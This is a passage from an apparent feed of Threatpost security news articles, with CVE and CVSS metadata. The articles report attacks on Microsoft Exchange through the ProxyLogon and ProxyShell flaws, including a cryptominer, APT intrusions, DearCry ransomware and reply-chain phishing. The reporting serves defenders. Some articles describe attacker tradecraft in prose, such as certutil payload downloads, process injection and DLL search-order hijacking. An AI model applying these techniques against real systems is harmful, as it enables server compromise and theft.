server\u2019s Outlook Web Access logon path (/owa/auth), according to the report. Under closer inspection, the .zip file was not a compressed archive at all but a batch script that then invoked the built-into-Windows certutil.exe program to download two additional files, win_s.zip and win_d.zip, which also were not compressed.\n\nThe first file is written out to the filesystem as QuickCPU.b64, an executable payload in base64 that can be decoded by the certutil application, which by design can decode base64-encoded security certificates, researchers observed.\n\nThe batch script then runs another command that outputs the decoded executable into the same directory. Once decoded, the batch script runs the executable, which extracts the miner and configuration data from the QuickCPU.dat file, injects it into a system process, and then deletes any evidence that it was there, according to the report.\n\nThe executable in the attack appears to contain a modified version of a tool publicly available on Github called PEx64-Injector, which is [described](<https://github.com/0xyg3n/PEx64-Injector>) on its Github page as having the ability to \u201cmigrate any x64 exe to any x64 process\u201d with \u201cno administrator privileges required,\u201d according to the report.\n\nOnce the file runs on an infected system, it extracts the contents of the QuickCPU.dat file, which includes an installer for the cryptominer and its configuration temporarily to the filesystem. It then configures the miner, injects it into a running process, then quits, according to the report. \u201cThe batch file then deletes the evidence and the miner remains running in memory, injected into a process already running on the system,\u201d Brandt wrote.\n\nResearchers observed the cryptominer receiving funds on March 9, which is when Microsoft also released updates to Exchange to patch the flaws. Though the attacker lost several servers after this date and the output from the miner decreased, other servers that were gained thereafter more than made up for the early losses, according to the report.\n\n## **Exploit-Chain History**\n\nThe ProxyLogon problem started for Microsoft in early March when the company said it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. The exploit chain is comprised of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065).\n\nTogether the flaws created a pre-authentication remote code execution (RCE) exploit, meaning attackers can take over servers without knowing any valid account credentials. This gave them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAs previously mentioned, Microsoft released an out-of-band update [soon after](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in its scramble to patch the flaws in the ProxyLogon chain; however, while the company boasted later that month that 92 percent of affected machines already had been patched, much damage had already been done, and unpatched systems likely exist that remain vulnerable.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _**[**_FREE Threatpost event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _**[**_Register here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-15T12:19:13", "type": "threatpost", "title": "Attackers Target ProxyLogon Exploit to Install Cryptojacker", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-04-15T12:19:13", "id": "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "href": "https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-11T21:58:44", "description": "Recently patched Microsoft Exchange vulnerabilities are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world. Overall exploitation activity is snowballing, according to researchers.\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. Four flaws can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a webshell for further exploitation within the environment.\n\nAnd indeed, adversaries from the Chinese APT known as Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nMicrosoft was spurred to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) for the exploited bugs, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\n## **Rapidly Spreading Email Server Attacks**\n\nMicrosoft said last week that the attacks were \u201climited and targeted.\u201d But that\u2019s certainly no longer the case. Other security companies have [continued to say](<https://twitter.com/0xDUDE/status/1369302347617349642>) they have seen much broader, escalating activity with mass numbers of servers being scanned and attacked.\n\nESET researchers [had confirmed this](<https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/>) as well, and on Wednesday announced that it had pinpointed at least 10 APTs going after the bugs, including Calypso, LuckyMouse, Tick and Winnti Group.\n\n\u201cOn Feb. 28, we noticed that the vulnerabilities were used by other threat actors, starting with Tick and quickly joined by LuckyMouse, Calypso and the Winnti Group,\u201d according to [the writeup](<https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/>). \u201cThis suggests that multiple threat actors gained access to the details of the vulnerabilities before the release of the patch, which means we can discard the possibility that they built an exploit by reverse-engineering Microsoft updates.\u201d\n\n> The [@DIVDnl](<https://twitter.com/DIVDnl?ref_src=twsrc%5Etfw>) scanned over 250K Exchange servers. Sent over 46k emails to the owners. The amount of vulnerable servers is going down. The number of compromised systems is going up. More organizations start investigating their systems for [#Hafnium](<https://twitter.com/hashtag/Hafnium?src=hash&ref_src=twsrc%5Etfw>) exploits.<https://t.co/XmQhHd7OA9>\n> \n> \u2014 Victor Gevers (@0xDUDE) [March 9, 2021](<https://twitter.com/0xDUDE/status/1369302347617349642?ref_src=twsrc%5Etfw>)\n\nThis activity was quickly followed by a raft of other groups, including CactusPete and Mikroceen \u201cscanning and compromising Exchange servers en masse,\u201d according to ESET.\n\n\u201cWe have already detected webshells on more than 5,000 email servers [in more than 115 countries] as of the time of writing, and according to public sources, [several important organizations](<https://twitter.com/sundhaug92/status/1369669037924483087>), such as the European Banking Authority, suffered from this attack,\u201d according to the ESET report.\n\nIt also appears that threat groups are piggybacking on each other\u2019s work. For instance, in some cases the webshells were dropped into Offline Address Book (OAB) configuration files, and they appeared to be accessed by more than one group.\n\n\u201cWe cannot discount the possibility that some threat actors might have hijacked the webshells dropped by other groups rather than directly using the exploit,\u201d said ESET researchers. \u201cOnce the vulnerability had been exploited and the webshell was in place, we observed attempts to install additional malware through it. We also noticed in some cases that several threat actors were targeting the same organization.\u201d\n\n## **Zero-Day Activity Targeting Microsoft Exchange Bugs**\n\nESET has documented a raft of activity targeting the four vulnerabilities, including multiple zero-day compromises before Microsoft rolled patches out.\n\nFor instance, Tick, which has been infiltrating organizations primarily in Japan and South Korea since 2008, was seen compromising the webserver of an IT company based in East Asia two days before Microsoft released its patches for the Exchange flaws.\n\n\u201cWe then observed a Delphi backdoor, highly similar to previous Delphi implants used by the group,\u201d ESET researchers said. \u201cIts main objective seems to be intellectual property and classified information theft.\u201d\n\n\n\nA timeline of ProxyLogon activity. Source: ESET.\n\nOne day before the patches were released, LuckyMouse (a.k.a. APT27 or Emissary Panda) compromised the email server of a governmental entity in the Middle East, ESET observed. The group is cyberespionage-focused and is known for breaching multiple government networks in Central Asia and the Middle East, along with transnational organizations like the International Civil Aviation Organization (ICAO) in 2016.\n\n\u201cLuckyMouse operators started by dropping the Nbtscan tool in C:\\programdata\\, then installed a variant of the ReGeorg webshell and issued a GET request to http://34.90.207[.]23/ip using curl,\u201d according to ESET\u2019s report. \u201cFinally, they attempted to install their SysUpdate (a.k.a. Soldier) modular backdoor.\u201d\n\nThat same day, still in the zero-day period, the Calypso spy group compromised the email servers of governmental entities in the Middle East and in South America. And in the following days, it targeted additional servers at governmental entities and private companies in Africa, Asia and Europe using the exploit.\n\n\u201cAs part of these attacks, two different backdoors were observed: a variant of PlugX specific to the group (Win32/Korplug.ED) and a custom backdoor that we detect as Win32/Agent.UFX (known as Whitebird in a Dr.Web report),\u201d according to ESET. \u201cThese tools are loaded using DLL search-order hijacking against legitimate executables (also dropped by the attackers).\u201d\n\nESET also observed the Winnti Group exploiting the bugs, a few hours before Microsoft released the patches. Winnti (a.k.a. APT41 or Barium, known for [high-profile supply-chain attacks against the video game and software industries](<https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/>)) compromised the email servers of an oil company and a construction equipment company, both based in East Asia.\n\n\u201cThe attackers started by dropping webshells,\u201d according to ESET. \u201cAt one of the compromised victims we observed a [PlugX RAT](<https://threatpost.com/ta416-apt-plugx-malware-variant/161505/>) sample (also known as Korplug)\u2026at the second victim, we observed a loader that is highly similar to previous Winnti v.4 malware loaders\u2026used to decrypt an encrypted payload from disk and execute it. Additionally, we observed various Mimikatz and password dumping tools.\u201d\n\nAfter the patches rolled out and the vulnerabilities were publicly disclosed, [CactusPete (a.k.a. Tonto Team)](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>) compromised the email servers of an Eastern Europe-based procurement company and a cybersecurity consulting company, ESET noted. The attacks resulted in the ShadowPad loader being implanted, along with a variant of the Bisonal remote-access trojan (RAT).\n\nAnd, the Mikroceen APT group (a.k.a. Vicious Panda) compromised the Exchange server of a utility company in Central Asia, which is the region it mainly targets, a day after the patches were released.\n\n## **Unattributed Exploitation Activity**\n\nA cluster of pre-patch activity that ESET dubbed Websiic was also seen targeting seven email servers belonging to private companies (in the domains of IT, telecommunications and engineering) in Asia and a governmental body in Eastern Europe.\n\nESET also said it has seen a spate of unattributed [ShadowPad activity](<https://threatpost.com/ccleaner-attackers-intended-to-deploy-keylogger-in-third-stage/130358/>) resulting in the compromise of email servers at a software development company based in East Asia and a real estate company based in the Middle East. ShadowPad is a cyber-attack platform that criminals deploy in networks to gain remote control capabilities, keylogging functionality and data exfiltration.\n\nAnd, it saw another cluster of activity targeting around 650 servers, mostly in the Germany and other European countries, the U.K. and the United States. All of the latter attacks featured a first-stage webshell called RedirSuiteServerProxy, researchers said.\n\nAnd finally, on four email servers located in Asia and South America, webshells were used to install IIS backdoors after the patches came out, researchers said.\n\nThe groundswell of activity, particularly on the zero-day front, brings up the question of how knowledge of the vulnerabilities was spread between threat groups.\n\n\u201cOur ongoing research shows that not only Hafnium has been using the recent RCE vulnerability in Exchange, but that multiple APTs have access to the exploit, and some even did so prior to the patch release,\u201d ESET concluded. \u201cIt is still unclear how the distribution of the exploit happened, but it is inevitable that more and more threat actors, including ransomware operators, will have access to it sooner or later.\u201d\n\nOrganizations with on-premise Microsoft Exchange servers should patch as soon as possible, researchers noted \u2013 if it\u2019s not already too late.\n\n\u201cThe best mitigation advice for network defenders is to apply the relevant patches,\u201d said Joe Slowick, senior security researcher with DomainTools, in a [Wednesday post](<https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders>). \u201cHowever, given the speed in which adversaries weaponized these vulnerabilities and the extensive period of time pre-disclosure when these were actively exploited, many organizations will likely need to shift into response and remediation activities \u2014 including attack surface reduction and active threat hunting \u2014 to counter existing intrusions.\u201d\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n\n** **\n", "cvss3": {}, "published": "2021-03-11T18:01:16", "type": "threatpost", "title": "Microsoft Exchange Servers Face APT Attack Tsunami", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-11T18:01:16", "id": "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "href": "https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-16T14:17:03", "description": "Cybercriminals are now using compromised Microsoft Exchange servers as a foothold to deploy a new ransomware family called DearCry, Microsoft has warned.\n\nThe ransomware is the latest threat to beleaguer vulnerable Exchange servers, emerging shortly after Microsoft [issued emergency patches in early March](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) for four Microsoft Exchange flaws. The flaws [can be chained together](<https://threatpost.com/microsoft-patch-tuesday-updates-critical-bugs/164621/>) to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials.\n\nThe flaws give attackers the opportunity to install a webshell for further exploitation within the environment \u2014 and now, researchers say attackers are downloading the new ransomware strain (a.k.a. Ransom:Win32/DoejoCrypt.A) as part of their post-exploitation activity on unpatched servers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cWe have detected and are now blocking a new family of ransomware being used after an initial compromise of unpatched on-premises Exchange Servers,\u201d Microsoft said [on Twitter](<https://twitter.com/MsftSecIntel/status/1370236539427459076>), Thursday.\n\n## **DearCry Ransomware**\n\nDearCry first came onto the infosec space\u2019s radar after ransomware expert Michael Gillespie [on Thursday said he observed](<https://twitter.com/demonslay335/status/1370125343571509250>) a \u201csudden swarm\u201d of submissions to his ransomware identification website, ID-Ransomware.\n\nThe ransomware uses the extension \u201c.CRYPT\u201d when encrypting files, as well as a filemarker \u201cDEARCRY!\u201d in the string for each encrypted file.\n\n[Microsoft later confirmed](<https://twitter.com/phillip_misner/status/1370197696280027136>) that the ransomware was being launched by attackers using the four Microsoft Exchange vulnerabilities, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\nhttps://twitter.com/demonslay335/status/1370125343571509250\n\nAccording to a [report by BleepingComputer](<https://www.bleepingcomputer.com/news/security/ransomware-now-attacks-microsoft-exchange-servers-with-proxylogon-exploits/amp/>), the ransomware drops a ransom note (called \u2018readme.txt\u2019) after initially infecting the victim \u2013 which contains two email addresses for the threat actors and demands a ransom payment of $16,000.\n\nMeanwhile, [MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1370130753586102272>) on Twitter said that victim companies of DearCry have been spotted in Australia, Austria, Canada, Denmark and the U.S. On Twitter, MalwareHunterTeam said the ransomware is \u201cnot that very widespread (yet?).\u201d Thus far, three samples of the DearCry ransomware were uploaded to VirusTotal on March 9 (the hashes for which [can be found here)](<https://twitter.com/malwrhunterteam/status/1370271414855593986>).\n\n## **Microsoft Exchange Attacks Doubling Every Hour**\n\nExploitation activity for the recently patched Exchange flaws continue to skyrocket, [with researchers this week warning](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) the flaws are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world.\n\n[New research by Check Point Software](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) said in the past 24 hours alone, the number of exploitation attempts on organizations have doubled every two to three hours.\n\nResearchers said they saw hundreds of exploit attempts against organizations worldwide \u2013 with the most-targeted industry sectors being government and military (making up 17 percent of all exploit attempts), manufacturing (14 percent) and banking (11 percent).\n\nResearchers warned that exploitation activity will continue \u2014 and urged companies that have not already done so to patch.\n\n\u201cSince the recently disclosed vulnerabilities on Microsoft Exchange Servers, a full race has started amongst hackers and security professionals,\u201d according to Check Point researchers. \u201cGlobal experts are using massive preventative efforts to combat hackers who are working day-in and day-out to produce an exploit that can successfully leverage the remote code-execution vulnerabilities in Microsoft Exchange.\u201d\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-12T16:26:07", "type": "threatpost", "title": "Microsoft Exchange Exploits Pave a Ransomware Path", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-12T16:26:07", "id": "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "href": "https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-26T23:21:31", "description": "Microsoft has broken its silence on the [recent barrage of attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) on several ProxyShell vulnerabilities in that were [highlighted](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) by a researcher at Black Hat earlier this month.\n\nThe company [released an advisory](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) late Wednesday letting customers know that threat actors may use unpatched Exchange servers \u201cto deploy ransomware or conduct other post-exploitation activities\u201d and urging them to update immediately.\n\n\u201cOur recommendation, as always, is to install the latest CU and SU on all your Exchange servers to ensure that you are protected against the latest threats,\u201d the company said. \u201cPlease update now!\u201d \n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)Customers that have installed the [May 2021 security updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>) or the [July 2021 security updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-july-2021-exchange-server-security-updates/ba-p/2523421>) on their Exchange servers are protected from these vulnerabilities, as are Exchange Online customers so long as they ensure that all hybrid Exchange servers are updated, the company wrote.\n\n\u201cBut if you have not installed either of these security updates, then your servers and data are vulnerable,\u201d according to the advisory.\n\nThe ProxyShell bugs that Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) outlined in a presentation at Black Hat. The three vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) enable an adversary to trigger remote code execution on Microsoft Exchange servers. Microsoft said the bugs can be exploited in the following cases:\n\n\u2013The server is running an older, unsupported CU;\n\n\u2013The server is running security updates for older, unsupported versions of Exchange that were [released](<https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-cumulative/ba-p/2192020>) in March 2021; or\n\n\u2013The server is running an older, unsupported CU, with the [March 2021 EOMT](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) mitigations applied.\n\n\u201cIn all of the above scenarios, you _must_ install one of latest supported CUs and all applicable SUs to be protected,\u201d according to Microsoft. \u201cAny Exchange servers that are not on a supported CU _and_ the latest available SU are vulnerable to ProxyShell and other attacks that leverage older vulnerabilities.\u201d\n\n**Sounding the Alarm**\n\nFollowing Tsai\u2019s presentation on the bugs, the SANS Internet Storm Center\u2019s Jan Kopriva [reported](<https://isc.sans.edu/forums/diary/ProxyShell+how+many+Exchange+servers+are+affected+and+where+are+they/27732/>) that [he found more](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) than 30,000 vulnerable Exchange servers via a Shodan scan and that any threat actor worthy of that title would find exploiting then easy to execute, given how much information is available.\n\nSecurity researchers at Huntress also reported seeing [ProxyShell vulnerabilities](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) being actively exploited throughout the month of August to install backdoor access once the [ProxyShell exploit code](<https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1>) was published on Aug. 6. But starting last Friday, Huntress reported a \u201csurge\u201d in attacks after finding 140 webshells launched against 1,900 unpatched Exchange servers.\n\nThe Cybersecurity & Infrastructure Security Agency (CISA) joined those sounding the alarm over the weekend, issuing [an urgent alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>). They, too, urged organizations to immediately install the latest Microsoft Security Update.\n\nAt the time, researcher Kevin Beaumont expressed [criticism over Microsoft\u2019s messaging efforts](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>) surrounding the vulnerability and the urgent need for its customers to update their Exchange Server security.\n\n\u201cMicrosoft decided to downplay the importance of the patches and treat them as a standard monthly Exchange patch, which [has] been going on for \u2013 obviously \u2013 decades,\u201d Beaumont explained.\n\nBut Beaumont said these remote code execution (RCE) vulnerabilities are \u201c\u2026as serious as they come.\u201d He noted that the company did not help matters by failing to allocate CVEs for them until July \u2014 four months after the patches were issued.\n\nIn order of patching priority, according to Beaumont, the vulnerabilities are: [CVE-2021\u201334473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021\u201334523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) and [CVE-2021\u201331207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>).\n\nCVE-2021-34473, a vulnerability in which a pre-auth path confusion leads to ACL Bypass, was patched in April. CVE-2021-34523, also patched in April, is an elevation of privilege on Exchange PowerShell backend. CVE-2021-31207, a bug in which a post-auth Arbitrary-File-Write leads to remote code execution, was patched in May.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-26T12:39:54", "type": "threatpost", "title": "Microsoft Breaks Silence on Barrage of ProxyShell Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-26T12:39:54", "id": "THREATPOST:83C349A256695022C2417F465CEB3BB2", "href": "https://threatpost.com/microsoft-barrage-proxyshell-attacks/168943/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-30T15:47:49", "description": "As of Friday \u2013 as in, shopping-on-steroids Black Friday \u2013 retail titan IKEA was wrestling with a then-ongoing reply-chain email phishing attack in which attackers were malspamming replies to stolen email threads.\n\n[BleepingComputer](<https://www.bleepingcomputer.com/news/security/ikea-email-systems-hit-by-ongoing-cyberattack/>) got a look at internal emails \u2013 one of which is replicated below \u2013 that warned employees of the attack, which was targeting the company\u2019s internal email inboxes. The phishing emails were coming from internal IKEA email addresses, as well as from the systems compromised at the company\u2019s suppliers and partners.\n\n> \u201cThere is an ongoing cyberattack that is targeting Inter IKEA mailboxes. Other IKEA organisations, suppliers, and business partners are compromised by the same attack and are further spreading malicious emails to persons in Inter IKEA.\n> \n> \u201cThis means that the attack can come via email from someone that you work with, from any external organisation, and as reply to an already ongoing conversation. It is therefore difficult to detect, for which we ask you to be extra cautious.\u201d \u2013IKEA internal email to employees.\n\nAs of Tuesday morning, the company hadn\u2019t seen any evidence of its customers\u2019 data, or business partners\u2019 data, having been compromised. \u201cWe continue to monitor to ensure that our internal defence mechanisms are sufficient,\u201d the spokesperson said, adding that \u201cActions have been taken to prevent damages\u201d and that \u201ca full-scale investigation is ongoing.\u201d____\n\nThe spokesperson said that the company\u2019s \u201chighest priority\u201d is that \u201cIKEA customers, co-workers and business partners feel certain that their data is secured and handled correctly.\u201d\n\nIKEA didn\u2019t respond to Threatpost\u2019s queries about whether the attack has been contained or if it\u2019s still ongoing.\n\n## Example Phishing Email\n\nIKEA sent its employees an example phishing email, shown below, that was received in Microsoft Outlook. The company\u2019s IT teams reportedly pointed out that the reply-chain emails contain links ending with seven digits. Employees were warned against opening the emails, regardless of who sent them, and were asked to immediately report the phishing emails to the IT department if they receive them.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/29144159/phishing-email-e1638214934826.jpeg>)\n\nExample phishing email sent to IKEA employees. Source: BleepingComputer.\n\n## Exchange Server Attacks D\u00e9j\u00e0 Vu?\n\nThe attack sounds familiar: Earlier this month, Trend Micro published a [report](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) about attackers who were doing the same thing with replies to hijacked email threads. The attackers were gnawing on the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange Server to hijack email chains, by malspamming replies to ongoing email threads and hence boosting the chance that their targets would click on malicious links that lead to malware infection.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nAs security experts have noted, hijacking email replies for malspam campaigns is a good way to slip past people\u2019s spam suspicions and to avoid getting flagged or quarantined by email gateways.\n\nWhat was still under discussion at the time of the Trend Micro report: Whether the offensive was delivering SquirrelWaffle, the new email loader that [showed up](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) in September, or whether SquirrelWaffle was just one piece of malware among several that the campaigns were dropping.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)\n\nMalicious Microsoft Excel document. Source: Trend Micro.\n\nCisco Talos researchers first [got wind](<https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) of the SquirrelWaffle malspam campaigns beginning in mid-September, when they saw boobytrapped Microsoft Office documents delivering [Qakbot malware](<https://threatpost.com/prolock-ransomware-qakbot-trojan/155828/>) and the penetration-testing tool [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) \u2013 two of the most common threats regularly observed targeting organizations around the world. The Office documents infected systems with SquirrelWaffle in the initial stage of the infection chain.\n\nSquirrelWaffle campaigns are known for using stolen email threads to increase the chances that a victim will click on malicious links. Those rigged links are tucked into an email reply, similar to how the virulent [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) malware \u2013 typically spread via malicious emails or text messages \u2013 has been known to work.\n\nTrend Micro\u2019s incident-response team had decided to look into what its researchers believed were SquirrelWaffle-related intrusions in the Middle East, to figure out whether the attacks involved the notorious, [oft-picked-apart](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) [ProxyLogon](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) and [ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) Exchange server vulnerabilities.\n\nTheir conclusion: Yes, the intrusions were linked to ProxyLogon and ProxyShell attacks on unpatched Exchange servers, as evidenced by the IIS logs of three compromised servers, each compromised in a separate intrusion, all having been exploited via the ProxyShell and ProxyLogon vulnerabilities [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) and [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>).\n\nIn the Middle East campaign that Trend Micro analyzed, the phishing emails contained a malicious Microsoft Excel doc that did [what malicious Excel documents do](<https://threatpost.com/hackers-update-age-old-excel-4-0-macro-attack/154898/>): It prompted targets to choose \u201cEnable Content\u201d to view a protected file, thus launching the infection chain.\n\nSince IKEA hasn\u2019t responded to media inquiries, it\u2019s impossible to say for sure whether or not it has suffered a similar attack. However, there are yet more similarities between the IKEA attack and the Middle East attack analyzed by Trend Micro earlier this month. Specifically, as BleepingComputer reported, the IKEA reply-email attack is likewise deploying a malicious Excel document that similarly instructs recipients to \u201cEnable Content\u201d or \u201cEnable Editing\u201d to view it.\n\nTrend Micro shared a screen capture, shown below, of how the malicious Excel document looked in the Middle East campaign:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)\n\nMalicious Microsoft Excel document. Source: Trend Micro.\n\n## You Can\u2019t Trust Email from \u2018Someone You Know\u2019\n\nIt\u2019s easy to mistake the malicious replies as coming from legitimate senders, given that they pop up in ongoing email threads. Saryu Nayyar, CEO of Gurucul, noted that IKEA employees are learning the hard way that replies in threads aren\u2019t necessarily legitimate and can be downright malicious.\n\n\u201cIf you get an email from someone you know, or that seems to continue an ongoing conversation, you are probably inclined to treat it as legitimate,\u201d she told Threatpost via email on Monday. \u201cHowever, IKEA employees are finding out otherwise. They are being attacked by phishing emails that are often purportedly from known sources, and may be carrying the Emotet or Qbot trojans to further infect the system and network.\u201d\n\nThis attack is \u201cparticularly insidious,\u201d she commented, in that it \u201cseemingly continues a pattern of normal 